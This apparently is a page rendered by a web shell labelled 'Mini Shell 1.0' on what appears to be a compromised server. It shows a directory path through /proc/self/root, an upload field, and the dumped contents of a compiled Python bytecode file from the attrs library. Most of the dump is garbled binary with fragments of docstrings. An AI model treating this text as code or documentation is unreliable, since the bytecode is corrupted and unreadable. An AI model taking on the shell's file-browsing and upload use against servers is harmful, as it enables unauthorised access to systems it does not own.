HOME


Mini Shell 1.0
Redirecting to https://devs.lapieza.net/iniciar-sesion Redirecting to https://devs.lapieza.net/iniciar-sesion.
DIR: /proc/self/root/usr/lib/python3/dist-packages/attr/__pycache__/
Upload File :
Current File : //proc/self/root/usr/lib/python3/dist-packages/attr/__pycache__/_next_gen.cpython-311.pyc
�

�c����dZddlmZddlmZddlmZddlmZ	ddl
mZmZm
Z
mZmZddlmZ	dd	d	d	d	d	d
dd
dd	ddd
d	dd
d	d	d	d
d�d
�ZeZeed
d	���Zed	d
d	d
d	d	d	dd	d	d	d	d�
d�Zd
d	d	d�d�Zd
d	d�d�Zd	S)z]
These are keyword-only APIs that call `attr.s` and `attr.ib` with different
default values.
�)�partial�)�setters)�asdict)�astuple)�NOTHING�_frozen_setattrs�_ng_default_on_setattr�attrib�attrs)�UnannotatedAttributeErrorNTF)�these�repr�unsafe_hash�hash�init�slots�frozen�weakref_slot�str�auto_attribs�kw_only�
cache_hash�auto_exc�eq�order�auto_detect�getstate_setstate�
on_setattr�field_transformer�
match_argsc����������	�
���
�����������
��������������	���fd���
���fd�}|�|S||��S)a�
    Define an ``attrs`` class.

    Differences to the classic `attr.s` that it uses underneath:

    - Automatically detect whether or not *auto_attribs* should be `True` (c.f.
      *auto_attribs* parameter).
    - If *frozen* is `False`, run converters and validators when setting an
      attribute by default.
    - *slots=True*

      .. caution::

         Usually this has only upsides and few visible effects in everyday
         programming. But it *can* lead to some suprising behaviors, so please
         make sure to read :term:`slotted classes`.
    - *auto_exc=True*
    - *auto_detect=True*
    - *order=False*
    - Some options that were only relevant on Python 2 or were kept around for
      backwards-compatibility have been removed.

    Please note that these are all defaults and you can change them as you
    wish.

    :param Optional[bool] auto_attribs: If set to `True` or `False`, it behaves
       exactly like `attr.s`. If left `None`, `attr.s` will try to guess:

       1. If any attributes are annotated and no unannotated `attrs.fields`\ s
          are found, it assumes *auto_attribs=True*.
       2. Otherwise it assumes *auto_attribs=False* and tries to collect
          `attrs.fields`\ s.

    For now, please refer to `attr.s` for the rest of the parameters.

    .. versionadded:: 20.1.0
    .. versionchanged:: 21.3.0 Converters are also run ``on_setattr``.
    .. versionadded:: 22.2.0
       *unsafe_hash* as an alias for *hash* (for :pep:`681` compliance).
    c���tdid|�d��d��d�	�d��d�
�d��d��d	��d
��d|�d��d
��d��d��d��d��dd�d��d�
�d��d���S)N�	maybe_clsrrrrrrrrrrrrrrrr�collect_by_mroTrrr r!�)r)�clsrrrrrr rrrrrr!rrrrrrrrs  ��������������������0/usr/lib/python3/dist-packages/attr/_next_gen.py�do_itzdefine.<locals>.do_itYs ����
�
�
��c�
��%�
���
���	
�
$��
���

��%�
��6�
�&��
���
�&��
��G�
�"�z�
��X�
��r�
� �%�!
�"$��#
�$ �4�%
�&0�/�'
�("�z�)
�*0�/�+
�,"�z�-
�	
�c����dtjfv}�dur	��t�|jD]/}|jt
ur|rt
d���tj�n�0���|���S	�|d��S#t$r�|d��cYSwxYw)z�
        Making this a wrapper ensures this code runs during class creation.

        We also ensure that frozen-ness of classes is inherited.
        NFz@Frozen classes can't use on_setattr (frozen-ness was inherited).T)r�NO_OPr
�	__bases__�__setattr__r	�
ValueErrorr
)r'�had_on_setattr�base_clsrr)rrs   ����r(�wrapzdefine.<locals>.wrapss����$�D�'�-�+@�@���U�?�?�z�1�/�J��
�		�		�H��#�'7�7�7�!��$�7����
%�]�
���8��#��5��l�+�+�+�	%��5��d�#�#�#��(�	%�	%�	%��5��e�$�$�$�$�$�	%���s�%A1�1B
�	B
r&)r$rrrrrrrrrrrrrrrrrrr r!r2r)s ```````````````````` @r(�definer3s������������������������B
�
�
�
�
�
�
�
�
�
�
�
�
�
�
�
�
�
�
�
�
�
�
�4!%�!%�!%�!%�!%�!%�!%�!%�J�����t�I���r*)rr�
�default�	validatorrrr�metadata�	converter�factoryrrrr�aliasc
�:�t||||||||||	|
||��
�
S)zx
    Identical to `attr.ib`, except keyword-only and with some arguments
    removed.

    .. versionadded:: 20.1.0
    r4)rr4s
             r(�fieldr<�sB��,���
�
�
�����
�������r*)�recurse�filter�value_serializerc�*�t||||d���S)z�
    Same as `attr.asdict`, except that collections types are always retained
    and dict is always used as *dict_factory*.

    .. versionadded:: 21.3.0
    T)�instr=r>r?�retain_collection_types)�_asdict)rAr=r>r?s    r(rr�s*���
���)� $����r*)r=r>c�(�t|||d���S)z�
    Same as `attr.astuple`, except that collections types are always retained
    and `tuple` is always used as the *tuple_factory*.

    .. versionadded:: 21.3.0
    T)rAr=r>rB)�_astuple)rAr=r>s   r(rr�s$���
�7�6�4����r*)N)�__doc__�	functoolsr�r�_funcsrrCrrE�_makerr	r
rr�
exceptionsr
r3�mutablerr<r&r*r(�<module>rMs�����������������%�%�%�%�%�%�'�'�'�'�'�'���������������2�1�1�1�1�1��C��	
��	
�	
�
���
����
��
������-C�C�C�C�C�L��	�����	6�	6�	6��

��	
�	
�	
�
�����
��
�$�$�$�$�$�N!���
�
�
�
�
� "�$�	�	�	�	�	�	�	r*